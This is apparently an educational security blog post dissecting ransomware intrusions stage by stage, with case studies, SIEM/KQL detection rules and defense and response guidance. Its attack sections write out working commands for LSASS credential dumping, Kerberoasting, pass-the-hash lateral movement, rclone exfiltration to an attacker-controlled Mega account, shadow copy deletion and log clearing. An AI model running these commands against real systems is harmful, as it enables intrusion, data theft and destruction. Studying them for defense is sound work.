Skip to content
← pwnsy/blog
beginner23 min readMar 10, 2026Updated Mar 11, 2026

Anatomy of a Ransomware Attack

ransomware#ransomware#malware#incident-response#lateral-movement#threat-intel

Key Takeaways

  • Ransomware is malware that encrypts a victim's files and demands cryptocurrency payment for the decryption key.
  • Modern ransomware operations follow a consistent pattern that maps directly to the MITRE ATT&CK framework.
  • Conti was the most prolific and operationally sophisticated ransomware group before its dissolution in May 2022 following its own internal data being leaked (ironically, by a Ukrainian member after the group publicly sided with Russia).
  • By the time files begin encrypting, the intrusion has usually been ongoing for days.
  • The standard 3-2-1 rule (3 copies, 2 media types, 1 offsite) is insufficient against modern ransomware.
  • The first minutes after ransomware discovery are the highest-leverage window.

On May 7, 2021, Colonial Pipeline — operator of 5,500 miles of pipeline supplying 45% of the East Coast's fuel — shut down operations after detecting ransomware on their network. The initial access vector: a single compromised VPN account with no multi-factor authentication. The attacker group, DarkSide, had been inside the network for weeks. The ransom paid: $4.4 million in Bitcoin. The economic disruption: panic buying across the Southeast United States, stations running dry, the Biden administration invoking emergency regulations to allow fuel transport by road.

This was not a sophisticated nation-state attack using zero-days. It was a password in a breach database, an unprotected VPN endpoint, and an operator who knew their business model.

Ransomware is not an advanced threat. It is a systematic, scalable criminal enterprise that has extracted over $1 billion annually since 2019, targets organizations of every size, and disproportionately damages healthcare systems, schools, and municipalities. Understanding the kill chain, the threat actors, and the specific technical controls that interrupt it is the only defense that scales.

What Ransomware Is and How the Business Works

Ransomware is malware that encrypts a victim's files and demands cryptocurrency payment for the decryption key. Modern operations layer double and triple extortion on top: pay for the decryptor, pay more to prevent publication of exfiltrated data, and sometimes face DDoS attacks against external infrastructure until payment is made.

The encryption itself is not novel. Modern ransomware uses hybrid encryption:

  1. Attacker generates an RSA-4096 or ECC key pair on their infrastructure. The public key is embedded in the ransomware binary.
  2. For each encrypted file, the malware generates a unique AES-256 key using the OS's CSPRNG.
  3. AES-256 encrypts the file contents. AES in CBC or CTR mode can process gigabytes per second — a 1TB drive can be encrypted in under an hour.
  4. The AES key is encrypted with the attacker's RSA public key and stored alongside the encrypted file.
  5. Without the RSA private key (which never leaves the attacker's control), the AES keys cannot be recovered, and the files cannot be decrypted.

This hybrid scheme is computationally sound. There is no algorithmic shortcut. If the ransomware implementation is correct, files cannot be recovered without the private key. The only paths to recovery are: paying the ransom (unreliable), law enforcement recovering the private key (rare), clean backups, or decryptors released after operator infrastructure is seized.

The Ransomware-as-a-Service Model

Modern ransomware does not require technical sophistication to deploy. RaaS platforms function like SaaS businesses:

Core Developers → Build and maintain malware, infrastructure, negotiation portals
       ↓
RaaS Platform → Dashboard, affiliate recruitment, technical support, payment processing
       ↓
Affiliates → Conduct intrusions, deploy ransomware, handle initial negotiation
       ↓
Revenue Split → Core team: 20-30%, Affiliates: 70-80%

LockBit, at its peak (2022-2024), had an affiliate program with hundreds of active members. Affiliates received a ready-to-use ransomware binary, a negotiation portal, a data leak site, and technical support. The affiliate's only job was gaining initial access and deploying the payload. This separation between development and execution explains why infrastructure takedowns are temporary — the affiliates simply move to competing platforms.

MITRE ATT&CK Mapping: The Full Kill Chain

Modern ransomware operations follow a consistent pattern that maps directly to the MITRE ATT&CK framework. Understanding each stage reveals the intervention points.

TA0001: Initial Access

Ransomware intrusions start through a small set of well-documented vectors. Mandiant's M-Trends 2024 report found:

  • Exploits (38%): Vulnerabilities in internet-facing systems — VPNs, firewalls, remote access appliances
  • Phishing (17%): Malicious attachments or links; increasingly HTML smuggling and ISO/IMG files
  • Prior compromises (15%): Existing access sold by initial access brokers (IABs) on dark web forums
  • Valid accounts (13%): Credentials from breaches, credential stuffing, or previously phished accounts

Key CVEs exploited in ransomware intrusions (2021-2024):

| CVE | Affected Product | Exploited By | CVSS | |---|---|---|---| | CVE-2021-20016 | SonicWall SMA100 | Multiple groups | 9.8 | | CVE-2021-34527 | Windows Print Spooler (PrintNightmare) | Multiple | 8.8 | | CVE-2021-44228 | Log4Shell (Apache Log4j) | Multiple | 10.0 | | CVE-2022-30190 | Microsoft Follina (MSDT) | Multiple | 7.8 | | CVE-2023-4966 | Citrix Bleed (NetScaler) | LockBit 3.0 | 9.4 | | CVE-2023-20198 | Cisco IOS XE Web UI | Multiple | 10.0 | | CVE-2023-22515 | Confluence Data Center | STORM-0062/LockBit | 10.0 | | CVE-2024-3400 | Palo Alto PAN-OS | Multiple | 10.0 |

The median time from public disclosure to ransomware exploitation dropped to 5 days in 2024 for critical severity vulnerabilities in perimeter devices. VPNs, firewalls, and remote access appliances are the primary targets because they are internet-facing, often underpatched, and provide direct internal network access upon exploitation.

Phishing delivery evolution: Modern ransomware phishing has abandoned macro-laden Office documents (disabled by default in Office 2022+) in favor of:

# Modern phishing delivery chain:
1. Email with HTML attachment or link
2. HTML file uses smuggling to decode/drop an ISO/IMG file
3. ISO auto-mounts in Windows 10+ (no prompt)
4. Inside ISO: LNK shortcut + DLL
5. LNK file executes: rundll32.exe malware.dll,EntryPoint
6. DLL loads: Cobalt Strike/Brute Ratel/Sliver stager in memory
7. No .exe, no obvious malware file on disk

Initial Access Broker (IAB) ecosystem: Before deploying ransomware, attackers frequently purchase existing access from IABs on forums like RAMP and Exploit.in. IABs maintain ongoing access to corporate networks (RDP credentials, compromised VPN accounts, persistent web shells) and auction them. A single IAB listing for "Fortune 500 company, domain admin access, 5000 endpoints" might sell for $50,000-$100,000 — a small fraction of the eventual ransomware demand.

TA0002: Execution and TA0003: Persistence

Once inside, the attacker deploys a command-and-control implant and establishes persistence to survive detection and reboots.

Common C2 frameworks used in pre-ransomware intrusions:

| Framework | Type | Detection Difficulty | |---|---|---| | Cobalt Strike | Commercial (cracked) | Moderate — signatures exist | | Brute Ratel C4 | Commercial (purchased) | High — less detection coverage | | Sliver | Open source | Moderate | | Mythic | Open source | Moderate | | Havoc | Open source | Lower |

Cobalt Strike "beaconing" — the periodic check-in to the C2 server — is detectable via network analysis. Beacon intervals are typically configurable between 60 seconds and 24 hours, with jitter to avoid regular timing signatures.

Persistence mechanisms (MITRE T1053, T1543, T1547):

# Scheduled task persistence (T1053.005)
schtasks /create /tn "WindowsUpdateChecker" /tr "C:\Users\Public\update.exe" /sc ONLOGON /ru SYSTEM
 
# Registry Run key (T1547.001)
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHelper" /t REG_SZ /d "C:\ProgramData\helper.exe"
 
# WMI event subscription (T1546.003) — harder to detect
$filter = ([wmiclass]"\\.\root\subscription:__EventFilter").CreateInstance()
$filter.Name = "SystemUpdate"
$filter.EventNamespace = "root\cimv2"
$filter.QueryLanguage = "WQL"
$filter.Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
$filter.Put()
# ... (consumer and binding omitted for brevity)
 
# Service installation (T1543.003)
sc create WindowsAudioManager binpath= "C:\ProgramData\svc.exe" start= auto
sc start WindowsAudioManager

Dwell time — the period between initial access and ransomware deployment — averaged 9 days in 2023 (Sophos Active Adversary Report 2024). Some sophisticated operations dwell for 30+ days, thoroughly mapping the environment before striking. Shorter dwell times (under 24 hours) are associated with opportunistic attacks on easy targets.

TA0004: Privilege Escalation

Local user access is insufficient for a widespread encryption attack. Domain Administrator (or equivalent) is required to push the encryptor to every machine simultaneously.

Primary privilege escalation techniques:

LSASS credential dumping (T1003.001):

# The classic: Mimikatz extracts NTLM hashes and plaintext passwords
# from LSASS memory (requires SYSTEM or SeDebugPrivilege)
mimikatz # sekurlsa::logonpasswords

# Modern alternative: Dump LSASS process memory, analyze offline
# (avoids touching disk with mimikatz binary)
# Via Task Manager: right-click lsass.exe → Create dump file
# Via comsvcs.dll (LOLBin):
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <LSASS_PID> C:\Windows\Temp\lsass.dmp full

# Via Sysinternals ProcDump (legitimate tool):
procdump.exe -ma lsass.exe lsass.dmp

Kerberoasting (T1558.003): Service accounts with SPNs configured can have their Kerberos tickets requested by any domain user. The ticket is encrypted with the service account's password hash and can be cracked offline.

# Request Kerberoastable tickets (Impacket)
GetUserSPNs.py domain.local/normaluser:password -dc-ip 10.0.0.1 -request
 
# PowerShell (Invoke-Kerberoast)
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -FilePath kerberoast.txt
 
# Then crack with hashcat
hashcat -m 13100 kerberoast.txt rockyou.txt -r rules/best64.rule

Key CVEs used for privilege escalation in ransomware intrusions:

  • ZeroLogon (CVE-2020-1472): Allows any network-connected attacker to set the Domain Controller's computer account password to empty, gaining DA instantly. Conti used this extensively in 2021.
  • PrintNightmare (CVE-2021-34527): Allows remote code execution with SYSTEM privileges via the Windows Print Spooler service. Virtually all major ransomware groups used this in 2021.
  • HiveNightmare/SeriousSAM (CVE-2021-36934): Non-admin users can read the SAM, SYSTEM, and SECURITY registry hives, allowing offline credential extraction. Patched in August 2021 but widely unpatched for months.

TA0008: Lateral Movement

With elevated credentials, operators move laterally using native Windows administration tools — "living off the land" (LOLBins) to blend with legitimate administrative traffic.

Common lateral movement techniques:

# PsExec — execute commands remotely (T1570)
PsExec.exe \\TARGET_HOST -u DOMAIN\admin -p password cmd.exe
PsExec.exe -accepteula \\10.0.0.50 cmd.exe
 
# WMI remote execution (T1021.006)
wmic /node:10.0.0.50 /user:DOMAIN\admin /password:password process call create "cmd.exe /c net user backdoor P@ss1234 /add"
 
# WinRM (T1021.006)
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\admin
Invoke-Command -ComputerName TARGET -ScriptBlock { whoami }
 
# SMB with pass-the-hash (T1550.002)
# Using Impacket's smbexec with NTLM hash instead of password
smbexec.py -hashes :NTLM_HASH DOMAIN/admin@10.0.0.50
 
# RDP (T1021.001)
# Standard RDP with compromised credentials
mstsc /v:10.0.0.50

During lateral movement, attackers enumerate:

# Network enumeration
net view /domain                           # List domains
net group "Domain Computers" /domain       # All computers
net group "Domain Admins" /domain          # DA accounts
 
# Share enumeration
net view \\FILESERVER01
net use Z: \\FILESERVER01\share            # Mount network share
 
# Find backup servers (high priority targets)
net group "Backup Operators" /domain
ping veeam01.domain.local
nslookup backup                            # DNS lookup for backup hostnames
 
# EDR/AV discovery (to evade or disable)
sc query type= all | findstr "CrowdStrike\|SentinelOne\|Carbon Black"
wmic /node:localhost product where "name like '%CrowdStrike%'" get name
Tip

The highest-value detection opportunity in most environments is lateral movement, not the initial compromise. Cobalt Strike beaconing from a single workstation can evade detection for days. The same beacon authenticating to 50 hosts via SMB within an hour is a screaming indicator. Alert on: any single host making new SMB connections to more than 10 unique internal hosts within 60 minutes.

TA0009: Collection and TA0010: Exfiltration

Before encrypting, attackers exfiltrate data. This enables double extortion: even victims with perfect backups must pay to prevent data publication.

Data staging:

# Identify high-value data first
dir /s /b *.pdf *.docx *.xlsx *.sql *.bak C:\
dir /s /b *financial* *salary* *password* *confidential* Z:\  # Network shares
 
# Compress and stage for exfiltration
7z a -mmt=8 -mx=1 staged_data.zip C:\staged\ \\FILESERVER01\share\
 
# Compress with password to evade DLP
7z a -p"ExfilPass2024" -mmt=8 data.7z \\FILESERVER01\Finance\

Exfiltration tools seen in pre-ransomware operations:

| Tool | Technique | Detection | |---|---|---| | Rclone | Syncs to attacker-controlled cloud (Mega, S3) | Outbound HTTPS to cloud providers; unusual rclone.conf | | MEGAsync | Uploads to MEGA.nz | HTTPS to MEGA endpoints | | WinSCP | SFTP to attacker server | Outbound port 22 from servers | | FileZilla | FTP | Outbound port 21 | | Cobalt Strike upload | C2 channel | Unusual C2 beacon activity |

# Rclone configuration file (found in memory or AppData after incident)
# This exfiltrated data to attacker-controlled Mega account:
[mega_remote]
type = mega
user = attacker@protonmail.com
pass = <encrypted>
 
# Used like:
# rclone copy Z:\Finance mega_remote:stolen/ --transfers 10 --no-traverse

TA0040: Impact — Encryption and Extortion

When the operator is ready to encrypt, they execute the final phase simultaneously across all compromised hosts. This is why ransomware is so destructive — it is not a slow, sequential process but a coordinated simultaneous strike.

Pre-encryption actions:

# Delete Volume Shadow Copies (T1490) — most reliable last-mile indicator
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
 
# Disable Windows Recovery features
schtasks /Change /TN "Microsoft\Windows\SystemRestore\SR" /DISABLE
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wbengine" /v Start /t REG_DWORD /d 4 /f
 
# Stop backup services
net stop vss
net stop SQLWriter
net stop "Volume Shadow Copy"
net stop "Windows Backup"
net stop Veeam*
 
# Clear event logs (evidence destruction)
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Warning

vssadmin delete shadows /all /quiet appearing in any process execution log is one of the most reliable ransomware indicators that exist. By the time this executes, the attack is in its final phase. Immediate isolation of all affected hosts is the only response. Automated alerting on this command — with automatic host isolation triggered through EDR — should be standard in any environment that takes ransomware seriously.

Distribution of the encryptor:

# Group Policy deployment (T1484.001)
# Attacker with DA creates a new GPO linked to all OUs
# GPO runs encryptor as a logon/startup script
 
# PsExec batch deployment
# Iterate through list of hosts, push encryptor via PsExec
for /F %%i in (hosts.txt) do (
    PsExec.exe \\%%i -s -d C:\Windows\Temp\svc.exe
)
 
# WMI simultaneous deployment
# From ransomware group playbook analysis by CISA/FBI advisories

Ransom note content and negotiation portal:

# Typical ransom note structure (composite from multiple incidents):
YOUR FILES HAVE BEEN ENCRYPTED

Company: [VICTIM COMPANY NAME]
Date: [DATE]
Victim ID: [UNIQUE ID]

Do not rename or move encrypted files.
Do not attempt to decrypt with third-party software — permanent damage will result.

To recover your files:
1. Visit our portal: http://[REDACTED].onion/[VICTIM_ID]
2. You have 72 hours before the price doubles
3. After 120 hours, your data will be published

WHAT WAS STOLEN: We have exfiltrated 2.3 TB of your data including:
- Financial records (Q1-Q4 2023)
- Employee PII and payroll data
- Customer database
- Intellectual property and source code

Case Studies: Detailed Technical Breakdowns

Conti Ransomware Group (2020–2022)

Conti was the most prolific and operationally sophisticated ransomware group before its dissolution in May 2022 following its own internal data being leaked (ironically, by a Ukrainian member after the group publicly sided with Russia).

The Conti playbook (documented after the leak revealed internal training materials):

Initial access: Purchase RDP or VPN access from IABs ($300-$30,000), or conduct spear phishing with BazarLoader/TrickBot malware. TrickBot was specifically used to identify high-value targets: it would collect domain information, Active Directory details, and network maps before selling the access to Conti.

Post-compromise toolkit:

  • Cobalt Strike (for C2 and lateral movement)
  • Mimikatz (credential dumping)
  • BloodHound/SharpHound (AD enumeration — graphed shortest path to DA)
  • ADFind (Active Directory enumeration)
  • Rclone (data exfiltration)
  • LockBit/Conti encryptor (deployment)

HSE Ireland (May 2021): Conti's attack on Ireland's Health Service Executive is one of the most documented healthcare ransomware incidents. Initial access: phishing email to an HSE workstation. Dwell time: approximately 8 weeks. The attackers mapped the entire HSE network, identified backup infrastructure, and moved laterally to over 80,000 endpoints. The encryption event forced Ireland's national healthcare system to cancel tens of thousands of appointments and revert to paper systems. Recovery cost: approximately €100 million over 18 months. The decryption tool was provided for free by Conti after international pressure — unusual behavior that reflected the political fallout from attacking national healthcare.

Costa Rica (April 2022): Conti attacked multiple Costa Rican government agencies simultaneously, demanding $20 million (later raised to $50 million), and declared "war" on the country when it refused to pay. This triggered a US State Department declaration that the attack qualified as a national emergency and a $15 million reward for information on Conti leadership.

FBI FLASH Technical Indicators (from FBI PIN 20220504):

# Conti IOCs
c2_domains:
  - rebrandly.com/   # Used for initial C2 redirect
  - *.xyz (multiple)
 
file_hashes_md5:
  - 3c6d6f8e8da50f4d3c57a7c12e5bd9d3  # Conti encryptor variant
  - a4f3e8b2c1d9a7f6e5d4c3b2a1908172  # BazarLoader variant
 
registry_keys:
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DHCP Service
 
processes:
  - conti.exe
  - locker.exe (various names)
  - bazar.exe
 
network_indicators:
  - TOR connections (port 9001, 9030)
  - Cobalt Strike C2 on port 443, 80 (malleable C2)

LockBit (2019–2024)

LockBit became the world's most prolific ransomware operation, claiming over 2,000 confirmed victims across its LockBit 2.0 and LockBit 3.0 versions. The group was remarkable for its:

  • Speed: LockBit 3.0 was reportedly the fastest ransomware ever created, using multithreading and I/O optimization to encrypt targets faster than defenders could respond
  • Affiliate model: Rigorous vetting of affiliates, detailed technical documentation, and a bug bounty program offering up to $1 million for vulnerabilities in their platform
  • PR operations: Active communications with journalists, attempted recruitment of victim company insiders, and public shaming of slow-paying victims

Technical innovation in LockBit 3.0 (released 2022):

- Encrypted configuration (RC4): obfuscates target lists and exclusions
- "Intermittent encryption": encrypts only the first 4096 bytes of large files
  → 40-60% faster encryption, files still effectively unreadable
- Pass-the-hash support: can use NTLM hashes directly without cleartext password
- Wake-on-LAN: sends WoL packets to power on sleeping machines before encrypting
- Polymorphic encryption of the binary: each build is unique, evading static signatures
- PrintNightmare exploitation built into the binary

Operation Cronos (February 2024): Law enforcement from 11 countries — Europol, FBI, NCA, and others — seized LockBit's infrastructure, took control of their dark web sites, and arrested or identified several operators. Prosecutors released decryption keys for approximately 1,000 victims. LockBit's administrator, "LockBitSupp," was identified as Dmitry Khoroshev, a 31-year-old Russian national, with a $10 million reward issued.

Within 5 days of the takedown, LockBit relaunched on new infrastructure. The affiliates — who were never arrested — continued operations. This illustrates the structural resilience of the RaaS model: dismantling the core does not eliminate the distributed affiliate network.

BlackCat / ALPHV (2021–2024)

BlackCat/ALPHV was notable for being the first major ransomware written in Rust (unusual choice that improved cross-platform compatibility and evaded some AV detection) and for the sophistication of its affiliate-targeting portal.

MGM Resorts (September 2023):

The MGM attack by Scattered Spider (an ALPHV affiliate) used pure social engineering for initial access:

Timeline:
- September 11, 2023: Scattered Spider conducts OSINT on MGM IT staff via LinkedIn
- September 11: 10-minute phone call to MGM helpdesk impersonating an IT employee
- Helpdesk resets credentials, provides VPN access
- Hours later: ALPHV ransomware deployed across MGM's Okta identity platform
  → All MGM properties affected: Las Vegas casinos, hotels
- September 11-20: MGM refuses to pay ransom
- Total impact: $100M+ in direct costs, 10+ days of disruption
  → Slot machines down, hotel key cards failed, restaurant systems offline
  → MGM's estimated total cost including lost revenue: ~$100M

- Parallel: Caesars Entertainment paid approximately $15M ransom in September 2023
  after a similar Scattered Spider attack, which was not disclosed until required by SEC

ALPHV Healthcare Attack (February 2024):

UnitedHealth Group's subsidiary Change Healthcare processed 15 billion healthcare transactions annually — approximately 50% of US medical claims. ALPHV/Scattered Spider gained access through Citrix infrastructure without MFA, deployed ransomware on February 21, 2024.

Effects:

  • Pharmacies across the US unable to process insurance claims
  • Hospitals unable to verify patient insurance
  • $22 million ransom allegedly paid
  • Estimated $872 million in direct costs reported by UnitedHealth in Q1 2024 earnings
  • CEO Andrew Witty testified to Congress that attackers entered via credentials with no MFA

ALPHV then conducted an exit scam — shut down their RaaS platform while keeping the $22M payment, cheating their own affiliates. This destabilized the ransomware ecosystem temporarily before RansomHub and other groups absorbed ALPHV's affiliates.

Detection: Finding Ransomware Before Files Encrypt

By the time files begin encrypting, the intrusion has usually been ongoing for days. Effective ransomware defense requires detecting the precursor behaviors, not the encryption event.

SIEM Detection Rules

Splunk SPL — Detect vssadmin shadow copy deletion:

index=windows source="WinEventLog:Security" EventCode=4688
(CommandLine="*vssadmin*delete*shadows*" OR CommandLine="*wmic*shadowcopy*delete*")
| table _time, Computer, Account_Name, CommandLine
| eval severity="CRITICAL"
| alert

Splunk SPL — Detect mass SMB lateral movement:

index=windows source="WinEventLog:Security" EventCode=4624 Logon_Type=3
| stats count dc(Computer) as unique_targets by Account_Name, Source_Network_Address
| where unique_targets > 10 AND count > 20
| eval timeframe="60 minutes"
| table Account_Name, Source_Network_Address, unique_targets, count

Splunk SPL — Detect Cobalt Strike beacon patterns:

index=network sourcetype=zeek_dns
| eval domain_length=len(query)
| where domain_length > 25
| eval entropy=... (Shannon entropy calculation)
| where entropy > 3.5
| stats count by query, src
| where count > 10

KQL (Microsoft Sentinel) — Detect LSASS memory access:

DeviceProcessEvents
| where FileName =~ "lsass.exe"
| where InitiatingProcessFileName !in~ ("MsMpEng.exe", "csrss.exe", "wininit.exe",
    "CrowdStrike.exe", "SentinelAgent.exe", "MBAMService.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc

KQL — Detect volume shadow copy deletion:

DeviceProcessEvents
| where ProcessCommandLine has_any ("vssadmin", "wmic shadowcopy", "bcdedit")
| where ProcessCommandLine has_any ("delete", "shadows", "recoveryenabled")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

KQL — Detect Rclone exfiltration:

DeviceNetworkEvents
| where RemotePort == 443
| join kind=inner (
    DeviceProcessEvents
    | where FileName =~ "rclone.exe"
) on DeviceId, Timestamp
| project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessCommandLine

KQL — Detect rapid file encryption (file extension changes):

DeviceFileEvents
| where ActionType == "FileRenamed"
| where FileName matches regex @"\.\w{4,8}$"  // Encrypted extension
| summarize count() by bin(Timestamp, 1m), DeviceName, InitiatingProcessFileName
| where count_ > 100  // 100+ file renames in 1 minute
| order by count_ desc

Behavioral Indicators by Stage

Early detection (hours-days before encryption):

HIGH PRIORITY ALERTS:
✓ Cobalt Strike named pipe: \\.\pipe\MSSE-*-server (T1573)
✓ LSASS accessed by non-system process with SeDebugPrivilege
✓ New scheduled task created in SYSTEM context
✓ BloodHound/SharpHound execution (T1482)
✓ ADFind execution (T1018)
✓ Single host accessing >10 SMB shares in 60 minutes
✓ Service account authenticating to workstations (vs servers)
✓ PowerShell executing Base64-encoded commands (very common in legitimate use but useful in combination)

MEDIUM PRIORITY:
✓ Rclone or MEGAsync binary execution on servers
✓ 7-Zip compression of large file sets
✓ External RDP connections from new source IPs
✓ New local admin account creation

Late detection (hours before encryption):

CRITICAL - IMMEDIATE RESPONSE:
✓ vssadmin delete shadows
✓ wmic shadowcopy delete
✓ bcdedit /set recoveryenabled no
✓ net stop vss / net stop SQLWriter
✓ wevtutil cl (event log clearing)
✓ Mass file rename activity (>100 files/minute same process)
✓ .locked / .encrypted / .LOCKED extension appearing in file events

Defense Architecture

The 3-2-1-1-0 Backup Rule

The standard 3-2-1 rule (3 copies, 2 media types, 1 offsite) is insufficient against modern ransomware. The extended 3-2-1-1-0 rule:

3 - Three copies of data
2 - Two different storage media types
1 - One copy offsite
1 - One copy offline or air-gapped (ransomware cannot reach it)
0 - Zero backup errors after tested restores

The "1 offline" addition is the critical change. Ransomware operators specifically target backup infrastructure. Veeam, Commvault, and Veritas servers are high-priority targets during the reconnaissance phase — compromised backup infrastructure means the victim cannot recover without paying.

Offline backups:

  • Tape backups physically removed from the environment
  • Object storage with immutability enabled (AWS S3 Object Lock, Azure Blob immutable storage)
  • Write-once media
  • Backups to a completely separate AWS account or Azure subscription with no credentials accessible from the production environment
# AWS S3 Object Lock — immutable backup storage
aws s3api put-object-lock-configuration \
  --bucket my-backup-bucket \
  --object-lock-configuration \
    '{"ObjectLockEnabled":"Enabled","Rule":{"DefaultRetention":{"Mode":"COMPLIANCE","Days":90}}}'
 
# Backups written to this bucket cannot be deleted for 90 days
# even by the root account in COMPLIANCE mode

Test restores: Veeam's 2024 Data Protection Trends Report found that 75% of organizations experienced at least one backup restore failure in 2023. Test quarterly. Automated restore testing (spin up restored VM, verify service health, destroy) is achievable with most modern backup platforms.

Network Segmentation

Flat networks are the ransomware operator's best friend. A compromised accounting workstation in a flat network has direct connectivity to the domain controller, backup servers, and production databases. The same workstation in a properly segmented network cannot reach any of those directly.

# Minimum viable segmentation:
Workstation VLAN     → Cannot initiate connections to Server VLAN (only established/related)
Server VLAN          → Restricted outbound internet (proxy required, not direct)
DC VLAN              → No direct workstation access; only management jump server
Backup VLAN          → No inbound connections except from backup server itself
DMZ                  → No access to internal VLANs
Management VLAN      → PAM (privileged access workstation) required for admin

# Implementation via ACL (Cisco example):
ip access-list extended WORKSTATION_VLAN_OUT
  deny ip 10.1.0.0/24 10.2.0.0/24 log  ! Block workstations reaching servers directly
  deny ip 10.1.0.0/24 10.3.0.0/24 log  ! Block workstations reaching DCs
  permit ip 10.1.0.0/24 any            ! Allow internet via proxy

Patch Management Prioritization

Given the 5-day exploitation window for critical perimeter vulnerabilities, patch management must prioritize by exposure and severity:

Priority 1 (patch within 24-48 hours):
- Internet-facing VPN appliances (Fortinet, Palo Alto, Pulse/Ivanti, SonicWall)
- Internet-facing web applications with RCE vulnerabilities
- Remote Desktop Gateway / Citrix / VMware Horizon

Priority 2 (patch within 7 days):
- Internal systems with network-accessible RCE vulnerabilities
- Domain controllers for privilege escalation CVEs
- Backup servers

Priority 3 (standard patching cycle, 30 days):
- Non-critical internal systems
- Workstation OS updates

Tools:
- Tenable/Qualys for continuous vulnerability scanning
- Microsoft MSRC API for automated patch priority feeds
- CISA KEV (Known Exploited Vulnerabilities catalog) as mandatory patch triggers

EDR and Ransomware-Specific Controls

Modern EDR platforms (CrowdStrike Falcon, SentinelOne Singularity, Microsoft Defender for Endpoint) have ransomware-specific capabilities that go beyond traditional AV:

CrowdStrike Falcon:
- Ransomware File Encryption Protection: detects and blocks mass file encryption
- Memory protection: blocks process injection techniques
- Machine learning: behavioral detection of novel ransomware

SentinelOne:
- Rollback: automatically reverts encrypted files from Volume Shadow Copy if ransomware is detected
- Storyline: AI-based attack visualization showing full kill chain

Microsoft Defender for Endpoint:
- Controlled Folder Access: prevents unauthorized processes from modifying files in protected folders
- Attack Surface Reduction rules: block specific ransomware-associated behaviors

# Enable Controlled Folder Access via PowerShell:
Set-MpPreference -EnableControlledFolderAccess Enabled

# Add protected folders:
Add-MpPreference -ControlledFolderAccessProtectedFolders "D:\Finance"

# Attack Surface Reduction Rules — block Office macros from spawning processes:
Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Block

Response Playbook When You're Hit

The first minutes after ransomware discovery are the highest-leverage window. The decisions made in that window determine whether you recover in days or months.

Immediate Response (0-30 minutes)

1. CONFIRM — do not assume; verify encryption is actually occurring
   Check file extensions in known-good directories
   Check ransom note locations

2. DO NOT SHUT DOWN infected hosts immediately
   Memory forensics (running processes, network connections, decryption keys in RAM)
   are lost at power-off
   If a decryption key exists in memory, imaging RAM preserves it

3. ISOLATE via network disconnection, not power-off
   Pull network cable / disable NIC (Device Manager → disable)
   EDR host isolation if available: CrowdStrike "Contain Host" / SentinelOne "Isolate"
   Firewall ACL to block host-to-host communication

4. PRESERVE — do not wipe before imaging
   Memory capture: WinPmem for Windows, LiME for Linux
   Disk image: FTK Imager, dd
   Network packet capture if still active: Wireshark

5. ASSESS SCOPE — which hosts are affected?
   EDR console: look for ransomware detection events across all endpoints
   SIEM: search for vssadmin execution, file encryption activity in past 24-72 hours

6. NOTIFY — activate your IR plan
   Internal: CISO, legal, executives
   External: incident response retainer (if you have one), cyber insurance carrier
   Government: CISA (1-888-282-0870, CISA.gov/report), FBI (ic3.gov)

RAM Capture Commands

# WinPmem — Windows memory acquisition
# Download: https://github.com/Velocidex/WinPmem/releases
winpmem_mini_x64_rc2.exe memdump.raw
 
# Alternative: Magnet RAM Capture (GUI)
# https://www.magnetforensics.com/resources/magnet-ram-capture/
 
# For analysis with Volatility3:
vol -f memdump.raw windows.pslist         # Process list
vol -f memdump.raw windows.netscan        # Network connections
vol -f memdump.raw windows.malfind        # Suspicious injected memory
vol -f memdump.raw windows.cmdline        # Command line arguments per process

Before Paying: Check for Decryptors

No More Ransom Project: nomoreransom.org
- Law enforcement partnership (Europol, NHTCU, Kaspersky, McAfee)
- Free decryptors for: Conti (partial), REvil, Gandcrab, Locky, WannaCry (partially)
- Submit sample encrypted file to identify ransomware variant

Emsisoft Decryption Tools: emsisoft.com/en/ransomware-decryption/
- Free decryptors for dozens of variants
- Check after any law enforcement takedown — seized keys are often released

Coveware Ransomware Report:
- Tracks payment rates, decryption reliability by group
- 2023 data: decryptors work as advertised approximately 88% of the time when provided
- But: 17% of payers experience reinfection within 1 month
- And: paying marks you as a reliable payer in attacker records
Warning

Paying ransomware does not guarantee recovery. Decryptors are often slow (a 10TB file server taking 3 weeks to decrypt while business is stopped), occasionally corrupt large files, and sometimes fail entirely. One-third of organizations that pay are hit again within 30 days. The FBI explicitly recommends against payment. If you have tested, working backups, restore from backups — the recovery time is almost certainly shorter than the decryption process.

Ransomware Defense Checklist

Prevent Initial Access:

  • [ ] MFA on all VPN, RDP gateway, and remote access systems — no exceptions
  • [ ] Patch internet-facing systems within 48 hours of critical CVE disclosure
  • [ ] Subscribe to CISA KEV feed and treat listed CVEs as emergency patches
  • [ ] Disable RDP direct from internet; require VPN or zero-trust gateway
  • [ ] Implement email security: DMARC reject, sandboxed attachment detonation
  • [ ] Disable Office macros from the internet (Group Policy)

Limit Lateral Movement:

  • [ ] Implement network segmentation (workstations cannot reach domain controllers directly)
  • [ ] Disable NTLM v1 across the domain
  • [ ] Enable Windows Credential Guard (prevents LSASS dumping)
  • [ ] Deploy Local Administrator Password Solution (LAPS) — unique local admin passwords per host
  • [ ] Limit who has Domain Admin; regular users should not be DAs
  • [ ] Enable SMB signing to prevent relay attacks

Protect Backups:

  • [ ] Implement 3-2-1-1-0 backup strategy
  • [ ] Backups isolated from production network (separate credentials, no shared accounts)
  • [ ] Test backup restores quarterly — automated testing preferred
  • [ ] Enable object lock / immutability on cloud backup storage

Detect and Respond:

  • [ ] Alert on: vssadmin delete shadows, LSASS access, mass SMB from single host, Rclone execution
